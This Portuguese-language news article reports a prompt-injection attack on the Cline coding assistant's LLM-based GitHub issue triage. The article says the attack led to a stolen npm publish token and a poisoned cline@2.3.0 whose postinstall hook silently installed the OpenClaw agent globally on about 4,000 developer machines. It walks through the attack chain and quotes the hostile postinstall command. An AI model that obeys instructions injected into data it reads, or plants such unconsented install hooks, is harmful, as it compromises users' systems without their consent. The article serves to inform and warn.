Ataque de Prompt Injection instala OpenClaw em 4.000 PCs

Horário
ataque prompt injection instala openclaw 4000 pcs

Um ataque de segurança cibernética explorou uma vulnerabilidade de prompt injection no assistente de codificação por IA Cline, resultando na instalação não autorizada do agente autônomo OpenClaw em aproximadamente 4.000 computadores de desenvolvedores.

O Ataque: Prompt Injection e a Cadeia de Suprimentos

O incidente ocorreu no dia 17 de fevereiro de 2026, quando uma versão maliciosa do pacote cline@2.3.0 foi publicada no registro do npm (Node Package Manager). Esta versão foi baixada por cerca de 4.000 usuários durante um período de aproximadamente oito horas, antes que os mantenedores a retirassem do ar e lançassem a versão corrigida (2.4.0).

O vetor de ataque inicial não foi um código malicioso direto no pacote Cline, mas sim uma exploração da maneira como o próprio Cline utilizava IA para gerenciar suas interações no GitHub. A vulnerabilidade, que já havia sido descoberta e reportada por pesquisadores, permitia que um invasor injetasse comandos maliciosos através do título de uma issue (incidente) do GitHub.

A Mecânica da Exploração

A equipe do Cline havia implementado um fluxo de trabalho automatizado que utilizava um modelo de linguagem grande (LLM) – especificamente o Claude da Anthropic – para ler, classificar e atribuir etiquetas a novas issues reportadas no repositório do projeto. O erro crítico de segurança residia no fato de que o título da issue era passado ao agente de IA sem validação adequada.

O fluxo de ataque se desenrolou em etapas:

  • Um atacante explorou a vulnerabilidade de prompt injection no fluxo de triagem de issues do Cline.
  • Esta injeção de comando permitiu ao invasor obter acesso a segredos de publicação (tokens de autenticação) do projeto no npm, possivelmente através de um ataque de cache poisoning em fluxos de trabalho do GitHub Actions.
  • Com o token de publicação comprometido, o invasor publicou a versão cline@2.3.0, que continha uma instrução oculta no arquivo package.json.
  • A linha maliciosa era um script postinstall que executava: "postinstall": "npm install -g openclaw@latest".
  • Consequentemente, sempre que um desenvolvedor instalava o Cline 2.3.0, o OpenClaw era instalado globalmente no sistema operacional sem o consentimento ou conhecimento do usuário.

Veja também:

OpenClaw: O Payload Não Autorizado

Embora os mantenedores do Cline tenham afirmado que o OpenClaw é um projeto de código aberto legítimo e não um malware, sua instalação não autorizada representa um sério risco de segurança. O OpenClaw é conhecido por ser um agente de IA autônomo com permissões amplas, incluindo acesso total ao sistema de arquivos e capacidade de executar comandos remotos.

O fato de o agente ter sido instalado com privilégios de sistema em milhares de máquinas de desenvolvedores levanta preocupações significativas, pois o atacante teria a capacidade de instalar qualquer software, incluindo malware tradicional, em um ataque subsequente.

Impacto e Resposta

A Microsoft Threat Intelligence observou um aumento notável nas instalações do OpenClaw durante as oito horas em que a versão comprometida esteve disponível. Empresas de segurança, como a StepSecurity, confirmaram a contagem de cerca de 4.000 downloads da versão envenenada.

A resposta imediata dos mantenedores do Cline incluiu:

  1. Depreciação imediata da versão 2.3.0 do npm.
  2. Lançamento da versão corrigida 2.4.0.
  3. Revogação do token de publicação npm comprometido.
  4. Atualização do mecanismo de publicação do npm para usar OIDC provenance via GitHub Actions, visando maior segurança contra o roubo de tokens tradicionais.

Desdobramentos e Lições de Segurança de IA

Este incidente marca um ponto de inflexão, transformando discussões teóricas sobre a segurança de agentes de IA em uma realidade operacional de ataque à cadeia de suprimentos de software. A vulnerabilidade não estava no modelo de IA em si, mas na forma como o fluxo de trabalho automatizado interagia com dados não confiáveis (o título da issue).

Pesquisas subsequentes apontaram que agentes autônomos como o OpenClaw, que operam com acesso privilegiado, são vetores de ataque críticos. Foi relatado que o próprio OpenClaw já é alvo de malware (variantes do Vidar) que buscam extrair credenciais e chaves criptográficas de seus diretórios de configuração, reforçando a necessidade de isolamento e governança rigorosa para essas ferramentas.

Especialistas alertam que a confiança cega em código aberto ou em automações de IA, sem governança e auditoria robusta, cria novas e perigosas portas de entrada para ataques na cadeia de suprimentos. A lição central é que agentes de IA devem ser tratados como atores privilegiados, exigindo os mesmos níveis de controle de acesso e monitoramento que sistemas tradicionais de alto risco.

Continue lendo...